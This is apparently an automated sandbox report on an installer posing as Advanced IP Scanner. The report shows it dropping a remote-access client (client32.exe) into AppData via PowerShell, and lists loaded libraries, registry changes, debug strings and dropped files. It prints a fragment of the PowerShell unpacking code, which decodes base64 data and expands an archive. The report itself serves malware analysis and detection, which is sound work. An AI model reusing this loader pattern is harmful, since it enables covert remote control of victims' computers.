Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Advanced IP Scanner for Windows.lnk.2.dr

LNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\SystemUtil\nsm_vpro.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Automated click: Next

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: KC0uZWwr8p.exe

Static file information: File size 21424072 > 1048576

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll

Jump to behavior

Source: KC0uZWwr8p.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3149635060.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.1675033363.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.1758596218.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-4OBJP.tmp.2.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Gui.pdb source: is-MH6KB.tmp.2.dr
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: is-HN5GF.tmp.2.dr
Source:	Binary string: ucrtbase.pdb source: is-UNKVD.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Gui.pdbo source: is-MH6KB.tmp.2.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: is-PCUQ8.tmp.2.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-LNG1F.tmp.2.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: is-0N1O0.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3148929362.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.1674813000.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.1758377907.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-BLUTK.tmp.2.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: is-133UG.tmp.2.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: is-075U6.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-KE7IL.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-LNG1F.tmp.2.dr
Source:	Binary string: client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3149534462.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.1674950229.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.1758516966.000000006FFF5000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: is-UNKVD.tmp.2.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($encodedData);[System.IO.File]::WriteAllBytes($archiveFile, $decodedBytes);New-Item -ItemType Directory -Path $installPath;Expand-Archive -Path $archiveFile -DestinationPath $installP

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

6_2_11029230

Source: KC0uZWwr8p.exe	Static PE information: section name: .didata
Source: KC0uZWwr8p.tmp.0.dr	Static PE information: section name: .didata
Source: is-EFF8I.tmp.2.dr	Static PE information: section name: .didata
Source: is-0N1O0.tmp.2.dr	Static PE information: section name: .didat
Source: is-D0K3T.tmp.2.dr	Static PE information: section name: .00cfg
Source: is-5NJTL.tmp.2.dr	Static PE information: section name: .qtmetad
Source: is-RIP10.tmp.2.dr	Static PE information: section name: .qtmetad
Source: PCICL32.DLL.4.dr	Static PE information: section name: .hhshare

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079A8D62 pushad ; ret	4_2_079A8D63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079A6B72 push eax; ret	4_2_079A6B73
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079AA8DB pushad ; retf	4_2_079AA8E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079AC8D0 push esp; iretd	4_2_079AC8B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079AC801 push esp; retf	4_2_079AC831
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_079AC86A push esp; iretd	4_2_079AC8B1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1116B825 push ecx; ret	6_2_1116B838
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11166719 push ecx; ret	6_2_1116672C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C96BBF push ecx; ret	6_2_68C96BD2
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C94DF5 push 68C943F9h; retf	6_2_68C94E1F
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C94E20 push E5782583h; retf 0068h	6_2_68C94E7B
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1116B825 push ecx; ret	8_2_1116B838
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1104E56B push ecx; retf 0007h	8_2_1104E56C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11166719 push ecx; ret	8_2_1116672C

Source: msvcr100.dll.4.dr

Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-0N1O0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7UFVB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-RN6EP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8T81V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-LNMM3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-RR8GH.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-6IECG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NS45S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-5NJTL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-43K8A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-4OBJP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-A5E7F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3CKII.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-70A69.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-EU182.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-BOBPK.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-FUMI5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-EFF8I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-075U6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-VMB1B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-BLUTK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	Jump to dropped file
